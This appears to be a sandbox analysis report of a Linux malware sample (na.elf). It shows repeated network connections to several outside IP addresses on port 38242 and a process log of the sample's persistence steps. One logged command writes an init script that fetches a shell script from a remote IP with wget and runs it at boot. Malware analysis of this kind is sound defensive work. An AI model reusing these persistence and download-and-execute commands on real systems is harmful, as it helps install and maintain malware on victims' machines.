                                                                                Oct 11, 2024 10:46:32.644215107 CEST3895438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:32.644258976 CEST3895438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:32.649075985 CEST382423895487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:33.152962923 CEST3895438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:33.194801092 CEST382423895487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:33.194979906 CEST3895438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:34.154639006 CEST5313638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:34.159575939 CEST3824253136185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:34.159656048 CEST5313638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:34.159698009 CEST5313638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:34.164437056 CEST3824253136185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:34.667360067 CEST5313638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:34.682189941 CEST3824253136185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:34.682301998 CEST5313638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:35.669745922 CEST6010638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:35.674577951 CEST3824260106154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:35.674655914 CEST6010638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:35.674670935 CEST6010638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:35.679445982 CEST3824260106154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:36.181499958 CEST6010638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:36.187001944 CEST3824260106154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:36.187074900 CEST6010638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:37.183255911 CEST4113638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:37.188414097 CEST3824241136193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:37.188498020 CEST4113638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:37.188545942 CEST4113638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:37.193456888 CEST3824241136193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:37.696393013 CEST4113638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:37.748666048 CEST3824241136193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:37.801340103 CEST3824241136193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:37.801681042 CEST4113638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:38.698373079 CEST3896238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:38.705219030 CEST382423896287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:38.705329895 CEST3896238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:38.705375910 CEST3896238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:38.710624933 CEST382423896287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:39.214544058 CEST3896238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:39.275995970 CEST382423896287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:39.309108019 CEST382423896287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:39.309387922 CEST3896238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:40.216665030 CEST5314438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:40.223170996 CEST3824253144185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:40.223261118 CEST5314438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:40.223310947 CEST5314438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:40.228750944 CEST3824253144185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:40.730926991 CEST5314438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:40.741456985 CEST3824253144185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:40.741554976 CEST5314438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:41.733283043 CEST6011438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:41.739152908 CEST3824260114154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:41.739248991 CEST6011438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:41.739316940 CEST6011438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:41.745928049 CEST3824260114154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:42.248323917 CEST6011438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:42.258919954 CEST3824260114154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:42.258985996 CEST6011438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:43.249543905 CEST4114438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:43.254626036 CEST3824241144193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:43.254714966 CEST4114438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:43.254770041 CEST4114438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:43.260185003 CEST3824241144193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:43.762214899 CEST4114438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:43.793493986 CEST3824241144193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:43.793621063 CEST4114438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:44.764691114 CEST3897038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:44.769799948 CEST382423897087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:44.769876957 CEST3897038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:44.769925117 CEST3897038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:44.774791002 CEST382423897087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:45.277841091 CEST3897038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:45.316389084 CEST382423897087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:45.316561937 CEST3897038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:46.279917002 CEST5315238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:46.285134077 CEST3824253152185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:46.285228968 CEST5315238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:46.285293102 CEST5315238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:46.290245056 CEST3824253152185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:46.791738987 CEST5315238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:46.811506987 CEST3824253152185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:46.811610937 CEST5315238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:47.793574095 CEST6012238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:47.798649073 CEST3824260122154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:47.798722029 CEST6012238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:47.798751116 CEST6012238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:47.803602934 CEST3824260122154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:48.304896116 CEST6012238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:48.310713053 CEST3824260122154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:48.310772896 CEST6012238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:49.307221889 CEST4115238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:49.312427998 CEST3824241152193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:49.312531948 CEST4115238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:49.312587023 CEST4115238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:49.317671061 CEST3824241152193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:49.821124077 CEST4115238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:49.868834972 CEST3824241152193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:49.876914978 CEST3824241152193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:49.877049923 CEST4115238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:50.822941065 CEST3897838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:50.828291893 CEST382423897887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:50.828402996 CEST3897838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:50.828458071 CEST3897838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:50.833448887 CEST382423897887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:51.335946083 CEST3897838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:51.381679058 CEST382423897887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:51.382004023 CEST3897838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:52.337918043 CEST5316038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:52.343189955 CEST3824253160185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:52.343303919 CEST5316038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:52.343343019 CEST5316038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:52.348229885 CEST3824253160185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:52.849798918 CEST5316038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:52.885768890 CEST3824253160185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:52.885870934 CEST5316038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:53.851252079 CEST6013038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:53.856256962 CEST3824260130154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:53.856317997 CEST6013038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:53.856370926 CEST6013038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:53.861110926 CEST3824260130154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:54.364465952 CEST6013038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:54.369995117 CEST3824260130154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:54.370110989 CEST6013038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:55.366314888 CEST4116038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:55.371979952 CEST3824241160193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:55.372071981 CEST4116038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:55.372071981 CEST4116038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:55.377013922 CEST3824241160193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:55.880887985 CEST4116038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:55.910229921 CEST3824241160193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:55.910434961 CEST4116038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:56.882600069 CEST3898638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:56.888326883 CEST382423898687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:56.888407946 CEST3898638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:56.888458967 CEST3898638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:56.893426895 CEST382423898687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:57.396857023 CEST3898638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:57.444116116 CEST382423898687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:57.444431067 CEST3898638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:58.399168968 CEST5316838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:58.405659914 CEST3824253168185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:58.405734062 CEST5316838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:58.405766964 CEST5316838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:58.410554886 CEST3824253168185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:58.915390968 CEST5316838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:58.928056955 CEST3824253168185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:58.928153038 CEST5316838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:59.917540073 CEST6013838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:59.923949957 CEST3824260138154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:59.924015999 CEST6013838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:59.924065113 CEST6013838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:59.930706978 CEST3824260138154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:47:00.430984020 CEST6013838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:47:00.436574936 CEST3824260138154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:47:00.436655045 CEST6013838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:47:01.433693886 CEST4116838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:47:01.438715935 CEST3824241168193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:47:01.438815117 CEST4116838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:47:01.438860893 CEST4116838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:47:01.443828106 CEST3824241168193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:47:01.949127913 CEST4116838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:47:01.995527029 CEST3824241168193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:47:01.995599031 CEST4116838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:47:02.951330900 CEST3899438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:47:02.956366062 CEST382423899487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:47:02.956491947 CEST3899438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:47:02.956533909 CEST3899438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:47:02.961460114 CEST382423899487.120.84.105192.168.2.23

                                                                                System Behavior

                                                                                Start time (UTC):08:44:49
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/dash
                                                                                Arguments:-
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:49
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/rm
                                                                                Arguments:rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj
                                                                                File size:72056 bytes
                                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                Start time (UTC):08:44:49
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/dash
                                                                                Arguments:-
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:49
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/rm
                                                                                Arguments:rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj
                                                                                File size:72056 bytes
                                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:/tmp/na.elf
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:-
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:-
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/systemctl
                                                                                Arguments:systemctl enable custom.service
                                                                                File size:996584 bytes
                                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:-
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:-
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/chmod
                                                                                Arguments:chmod +x /etc/init.d/mybinary
                                                                                File size:63864 bytes
                                                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:-
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:-
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/ln
                                                                                Arguments:ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
                                                                                File size:76160 bytes
                                                                                MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:-
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/na.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting na.elf'\n /tmp/na.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping na.elf'\n killall na.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/na.elf"
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:-
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:sh -c "chmod +x /etc/init.d/na.elf >/dev/null 2>&1"
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:-
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/chmod
                                                                                Arguments:chmod +x /etc/init.d/na.elf
                                                                                File size:63864 bytes
                                                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:-
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:-
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/mkdir
                                                                                Arguments:mkdir -p /etc/rc.d
                                                                                File size:88408 bytes
                                                                                MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:-
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:sh -c "ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf >/dev/null 2>&1"
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/bin/sh
                                                                                Arguments:-
                                                                                File size:129816 bytes
                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/bin/ln
                                                                                Arguments:ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf
                                                                                File size:76160 bytes
                                                                                MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/tmp/na.elf
                                                                                Arguments:-
                                                                                File size:4956856 bytes
                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/lib/udisks2/udisksd
                                                                                Arguments:-
                                                                                File size:483056 bytes
                                                                                MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/sbin/dumpe2fs
                                                                                Arguments:dumpe2fs -h /dev/dm-0
                                                                                File size:31112 bytes
                                                                                MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/lib/systemd/systemd
                                                                                Arguments:-
                                                                                File size:1620224 bytes
                                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                Start time (UTC):08:44:55
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                File size:22760 bytes
                                                                                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/lib/udisks2/udisksd
                                                                                Arguments:-
                                                                                File size:483056 bytes
                                                                                MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                Start time (UTC):08:44:56
                                                                                Start date (UTC):11/10/2024
                                                                                Path:/usr/sbin/dumpe2fs
                                                                                Arguments:dumpe2fs -h /dev/dm-0
                                                                                File size:31112 bytes
                                                                                MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4